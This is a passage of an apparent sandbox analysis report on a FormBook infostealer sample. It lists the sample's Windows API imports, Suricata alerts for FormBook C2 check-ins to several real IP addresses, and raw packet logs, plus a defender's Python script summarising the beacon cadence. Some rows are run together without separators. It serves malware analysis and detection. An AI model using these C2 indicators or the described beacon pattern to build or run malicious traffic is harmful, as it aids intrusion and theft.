PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll | DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll | SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-21T17:24:45.946908+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49930 | 188.114.96.3 | 80 | TCP
2024-10-21T17:25:06.652560+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49988 | 52.13.151.179 | 80 | TCP
2024-10-21T17:25:09.193625+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49992 | 52.13.151.179 | 80 | TCP
2024-10-21T17:25:11.755140+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49993 | 52.13.151.179 | 80 | TCP
2024-10-21T17:25:14.287533+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49994 | 52.13.151.179 | 80 | TCP
2024-10-21T17:25:28.750060+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49995 | 103.106.67.112 | 80 | TCP
2024-10-21T17:25:31.062664+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49998 | 103.106.67.112 | 80 | TCP
2024-10-21T17:25:33.625032+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49999 | 103.106.67.112 | 80 | TCP
2024-10-21T17:25:36.374955+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50000 | 103.106.67.112 | 80 | TCP
2024-10-21T17:25:41.936045+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50001 | 188.114.96.3 | 80 | TCP
2024-10-21T17:25:44.510712+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50002 | 188.114.96.3 | 80 | TCP
2024-10-21T17:25:47.065312+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50003 | 188.114.96.3 | 80 | TCP
2024-10-21T17:25:49.591455+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50004 | 188.114.96.3 | 80 | TCP
2024-10-21T17:25:55.058197+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50005 | 3.33.130.190 | 80 | TCP
2024-10-21T17:25:57.616175+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50008 | 3.33.130.190 | 80 | TCP
2024-10-21T17:26:01.277397+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50009 | 3.33.130.190 | 80 | TCP
2024-10-21T17:26:04.855339+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50010 | 3.33.130.190 | 80 | TCP
                                                                                                                          2024-10-21T17:26:11.219341+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657327217.70.184.5080TCP
                                                                                                                          2024-10-21T17:26:13.751070+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657328217.70.184.5080TCP
                                                                                                                          2024-10-21T17:26:16.328131+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657329217.70.184.5080TCP
                                                                                                                          2024-10-21T17:26:18.811054+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.657330217.70.184.5080TCP
                                                                                                                          2024-10-21T17:26:24.623720+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65733394.23.162.16380TCP
                                                                                                                          2024-10-21T17:26:27.162255+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65733494.23.162.16380TCP
                                                                                                                          2024-10-21T17:26:29.632875+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65733594.23.162.16380TCP
                                                                                                                          2024-10-21T17:26:32.177100+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65733694.23.162.16380TCP
                                                                                                                          2024-10-21T17:26:38.750093+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657337103.224.182.24280TCP
                                                                                                                          2024-10-21T17:26:41.296892+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657338103.224.182.24280TCP
                                                                                                                          2024-10-21T17:26:43.843746+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657339103.224.182.24280TCP
                                                                                                                          2024-10-21T17:26:46.344977+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.657340103.224.182.24280TCP
                                                                                                                          2024-10-21T17:26:52.063051+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657341209.74.64.18780TCP
                                                                                                                          2024-10-21T17:26:54.627112+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657342209.74.64.18780TCP
                                                                                                                          2024-10-21T17:26:57.203134+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657343209.74.64.18780TCP
                                                                                                                          2024-10-21T17:26:59.734375+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.657344209.74.64.18780TCP
                                                                                                                          2024-10-21T17:27:05.640620+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65734765.21.196.9080TCP
                                                                                                                          2024-10-21T17:27:08.187589+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65734865.21.196.9080TCP
                                                                                                                          2024-10-21T17:27:10.688114+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65734965.21.196.9080TCP
                                                                                                                          2024-10-21T17:27:13.281250+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65735065.21.196.9080TCP
                                                                                                                          2024-10-21T17:27:19.884813+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573513.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:21.496502+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573523.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:24.048800+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573533.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:26.618719+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6573543.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:33.029167+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573553.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:34.636976+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573563.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:37.183225+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573573.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:39.729473+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6573583.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:46.501070+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573598.210.49.13980TCP
                                                                                                                          2024-10-21T17:27:49.030879+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573608.210.49.13980TCP
                                                                                                                          2024-10-21T17:27:51.575501+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573618.210.49.13980TCP
                                                                                                                          2024-10-21T17:27:54.172058+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6573628.210.49.13980TCP
                                                                                                                          2024-10-21T17:28:00.061996+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65736394.23.162.16380TCP
                                                                                                                          2024-10-21T17:28:02.600944+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65736694.23.162.16380TCP
                                                                                                                          2024-10-21T17:28:05.080540+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65736794.23.162.16380TCP
                                                                                                                          2024-10-21T17:28:07.631770+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65736894.23.162.16380TCP
                                                                                                                          2024-10-21T17:28:25.263211+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.657369188.114.96.380TCP
                                                                                                                          2024-10-21T17:28:30.849501+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65737052.13.151.17980TCP
                                                                                                                          2024-10-21T17:28:33.397854+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65737152.13.151.17980TCP
                                                                                                                          2024-10-21T17:28:35.945799+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65737252.13.151.17980TCP
                                                                                                                          2024-10-21T17:28:38.488784+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65737352.13.151.17980TCP
                                                                                                                          2024-10-21T17:28:52.296977+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657374103.106.67.11280TCP
                                                                                                                          2024-10-21T17:28:54.859422+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657375103.106.67.11280TCP
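The alert table above is regular enough to be summarised mechanically: the sandbox host walks a list of HTTP hosts, sends three POST check-ins (SID 2855464) and one GET (SID 2855465) to each, roughly 2.5 seconds apart, then moves to the next host. The script below is an added example written for this report (it is not Joe Sandbox or Emerging Threats code); it parses a subset of the rows from the table, re-joined here as tab-separated fields, groups consecutive alerts to the same destination into "runs", and reports the POST/GET cadence and the median gap between check-ins. The run grouping assumes alerts are already in time order, as they are in the table.

```python
"""Summarise FormBook C2 check-in alerts by destination host.

Added example for this report, not part of Joe Sandbox or the sample.
ALERTS is a subset of the Suricata alert rows shown above, re-joined as
tab-separated fields so the script runs offline.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Fields: timestamp, SID, signature, severity, src IP, src port, dst IP, dst port, proto
ALERTS = """\
2024-10-21T17:24:45.946908+0200\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.6\t49930\t188.114.96.3\t80\tTCP
2024-10-21T17:25:06.652560+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49988\t52.13.151.179\t80\tTCP
2024-10-21T17:25:09.193625+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49992\t52.13.151.179\t80\tTCP
2024-10-21T17:25:11.755140+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49993\t52.13.151.179\t80\tTCP
2024-10-21T17:25:14.287533+0200\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.6\t49994\t52.13.151.179\t80\tTCP
2024-10-21T17:25:28.750060+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49995\t103.106.67.112\t80\tTCP
2024-10-21T17:25:31.062664+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49998\t103.106.67.112\t80\tTCP
2024-10-21T17:25:33.625032+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49999\t103.106.67.112\t80\tTCP
2024-10-21T17:25:36.374955+0200\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.6\t50000\t103.106.67.112\t80\tTCP
2024-10-21T17:25:41.936045+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t50001\t188.114.96.3\t80\tTCP
2024-10-21T17:25:44.510712+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t50002\t188.114.96.3\t80\tTCP
2024-10-21T17:25:47.065312+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t50003\t188.114.96.3\t80\tTCP
2024-10-21T17:25:49.591455+0200\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.6\t50004\t188.114.96.3\t80\tTCP
"""


def parse_alerts(text):
    """Parse tab-separated alert rows into dicts with a timezone-aware timestamp."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, src, sport, dst, dport, proto = line.split("\t")
        # The HTTP method the ETPRO rule matched on is in parentheses in the signature name.
        method = sig[sig.index("(") + 1 : sig.index(")")]
        rows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid),
            "method": method,
            "src": src,
            "sport": int(sport),
            "dst": dst,
            "dport": int(dport),
            "proto": proto,
        })
    return rows


def checkin_runs(rows):
    """Group consecutive alerts to the same destination into runs.

    The sample contacts one host at a time, so a run is the burst of
    check-ins to a host before the malware moves on to the next one.
    Assumes rows are in chronological order.
    """
    runs = []
    for r in rows:
        if runs and runs[-1]["dst"] == r["dst"]:
            runs[-1]["alerts"].append(r)
        else:
            runs.append({"dst": r["dst"], "alerts": [r]})
    for run in runs:
        run["methods"] = [a["method"] for a in run["alerts"]]
        stamps = [a["ts"] for a in run["alerts"]]
        # Seconds between consecutive check-ins inside the run.
        run["gaps_s"] = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    return runs


def summarize(rows):
    """Per-destination totals: how many POST and GET check-ins each host received."""
    totals = defaultdict(lambda: {"POST": 0, "GET": 0})
    for r in rows:
        totals[r["dst"]][r["method"]] += 1
    return dict(totals)


def beacon_interval(rows):
    """Median gap in seconds between consecutive check-ins within a run."""
    gaps = [g for run in checkin_runs(rows) for g in run["gaps_s"]]
    return median(gaps) if gaps else None


if __name__ == "__main__":
    rows = parse_alerts(ALERTS)
    for run in checkin_runs(rows):
        print(run["dst"], " ".join(run["methods"]), [round(g, 2) for g in run["gaps_s"]])
    print("hosts:", sorted(summarize(rows)))
    print("median check-in gap (s):", round(beacon_interval(rows), 3))
```

The destination set this produces is the IOC list a defender would block or hunt on; the cadence (three POSTs, one GET, host rotation every 13 to 14 seconds) is what makes the traffic recognisable even where the individual ETPRO rules do not fire.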
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Oct 21, 2024 17:24:45.365761042 CEST  49930        80         192.168.2.6     188.114.96.3
Oct 21, 2024 17:24:45.371251106 CEST  80           49930      188.114.96.3    192.168.2.6
Oct 21, 2024 17:24:45.371388912 CEST  49930        80         192.168.2.6     188.114.96.3
Oct 21, 2024 17:24:45.379426956 CEST  49930        80         192.168.2.6     188.114.96.3
Oct 21, 2024 17:24:45.385018110 CEST  80           49930      188.114.96.3    192.168.2.6
Oct 21, 2024 17:24:45.945590973 CEST  80           49930      188.114.96.3    192.168.2.6
Oct 21, 2024 17:24:45.946857929 CEST  80           49930      188.114.96.3    192.168.2.6
Oct 21, 2024 17:24:45.946907997 CEST  49930        80         192.168.2.6     188.114.96.3
Oct 21, 2024 17:24:45.949054003 CEST  49930        80         192.168.2.6     188.114.96.3
Oct 21, 2024 17:24:45.954387903 CEST  80           49930      188.114.96.3    192.168.2.6
Oct 21, 2024 17:25:06.066015959 CEST  49988        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:06.074529886 CEST  80           49988      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:06.074637890 CEST  49988        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:06.085642099 CEST  49988        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:06.095686913 CEST  80           49988      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:06.652379990 CEST  80           49988      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:06.652417898 CEST  80           49988      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:06.652559996 CEST  49988        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:06.735044003 CEST  80           49988      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:06.735176086 CEST  49988        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:07.593779087 CEST  49988        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:08.613584995 CEST  49992        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:08.618895054 CEST  80           49992      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:08.619056940 CEST  49992        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:08.637603045 CEST  49992        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:08.642920971 CEST  80           49992      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:09.193495035 CEST  80           49992      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:09.193511009 CEST  80           49992      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:09.193624973 CEST  49992        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:09.273829937 CEST  80           49992      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:09.273974895 CEST  49992        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:10.140636921 CEST  49992        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:11.159233093 CEST  49993        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:11.165081024 CEST  80           49993      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:11.165194988 CEST  49993        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:11.176045895 CEST  49993        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:11.182020903 CEST  80           49993      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:11.182039022 CEST  80           49993      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:11.754978895 CEST  80           49993      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:11.755026102 CEST  80           49993      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:11.755140066 CEST  49993        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:11.834177971 CEST  80           49993      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:11.834382057 CEST  49993        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:12.687522888 CEST  49993        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:13.707015038 CEST  49994        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:13.712650061 CEST  80           49994      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:13.712794065 CEST  49994        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:13.720053911 CEST  49994        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:13.725557089 CEST  80           49994      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:14.287341118 CEST  80           49994      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:14.287419081 CEST  80           49994      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:14.287533045 CEST  49994        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:14.368536949 CEST  80           49994      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:14.368791103 CEST  49994        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:14.369508982 CEST  49994        80         192.168.2.6     52.13.151.179
Oct 21, 2024 17:25:14.374898911 CEST  80           49994      52.13.151.179   192.168.2.6
Oct 21, 2024 17:25:27.860243082 CEST  49995        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:27.865933895 CEST  80           49995      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:27.866054058 CEST  49995        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:27.875425100 CEST  49995        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:27.881354094 CEST  80           49995      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:28.708517075 CEST  80           49995      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:28.750060081 CEST  49995        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:28.765295029 CEST  80           49995      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:28.765397072 CEST  49995        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:29.390799999 CEST  49995        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:30.409354925 CEST  49998        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:30.415035963 CEST  80           49998      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:30.415158033 CEST  49998        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:30.426186085 CEST  49998        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:30.431811094 CEST  80           49998      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:31.017003059 CEST  80           49998      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:31.062664032 CEST  49998        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:31.071933985 CEST  80           49998      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:31.072021961 CEST  49998        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:31.937531948 CEST  49998        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:32.956110001 CEST  49999        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:32.961762905 CEST  80           49999      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:32.961963892 CEST  49999        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:32.973068953 CEST  49999        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:32.978851080 CEST  80           49999      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:32.979286909 CEST  80           49999      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:33.574793100 CEST  80           49999      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:33.625031948 CEST  49999        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:33.629647017 CEST  80           49999      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:33.629726887 CEST  49999        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:34.484409094 CEST  49999        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:35.502980947 CEST  50000        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:35.508668900 CEST  80           50000      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:35.508763075 CEST  50000        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:35.515748024 CEST  50000        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:35.521632910 CEST  80           50000      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:36.321356058 CEST  80           50000      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:36.374954939 CEST  50000        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:36.376540899 CEST  80           50000      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:36.376640081 CEST  50000        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:36.377504110 CEST  50000        80         192.168.2.6     103.106.67.112
Oct 21, 2024 17:25:36.383097887 CEST  80           50000      103.106.67.112  192.168.2.6
Oct 21, 2024 17:25:41.412554026 CEST  50001        80         192.168.2.6     188.114.96.3
Oct 21, 2024 17:25:41.418459892 CEST  80           50001      188.114.96.3    192.168.2.6
Oct 21, 2024 17:25:41.419413090 CEST  50001        80         192.168.2.6     188.114.96.3
Oct 21, 2024 17:25:41.430562019 CEST  50001        80         192.168.2.6     188.114.96.3
Oct 21, 2024 17:25:41.436007023 CEST  80           50001      188.114.96.3    192.168.2.6
Oct 21, 2024 17:25:41.935950041 CEST  80           50001      188.114.96.3    192.168.2.6
Oct 21, 2024 17:25:41.935970068 CEST  80           50001      188.114.96.3    192.168.2.6
Oct 21, 2024 17:25:41.935985088 CEST  80           50001      188.114.96.3    192.168.2.6
Oct 21, 2024 17:25:41.936044931 CEST  50001        80         192.168.2.6     188.114.96.3
Oct 21, 2024 17:25:41.936049938 CEST  80           50001      188.114.96.3    192.168.2.6
Oct 21, 2024 17:25:41.936064005 CEST  80           50001      188.114.96.3    192.168.2.6
Oct 21, 2024 17:25:41.936075926 CEST  80           50001      188.114.96.3    192.168.2.6
Oct 21, 2024 17:25:41.936093092 CEST  50001        80         192.168.2.6     188.114.96.3
Oct 21, 2024 17:25:41.936125994 CEST  50001        80         192.168.2.6     188.114.96.3
Oct 21, 2024 17:25:41.936213970 CEST  80           50001      188.114.96.3    192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.937129021 CEST8050001188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.937186956 CEST5000180192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:42.937635899 CEST5000180192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:43.958801985 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:43.964370012 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:43.964462996 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:43.983957052 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:43.991121054 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510607958 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510621071 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510632992 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510639906 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510648966 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510656118 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510703087 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510710001 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510711908 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:44.510803938 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:44.510803938 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:44.513263941 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.513442039 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:45.500166893 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:46.519042015 CEST5000380192.168.2.6188.114.96.3
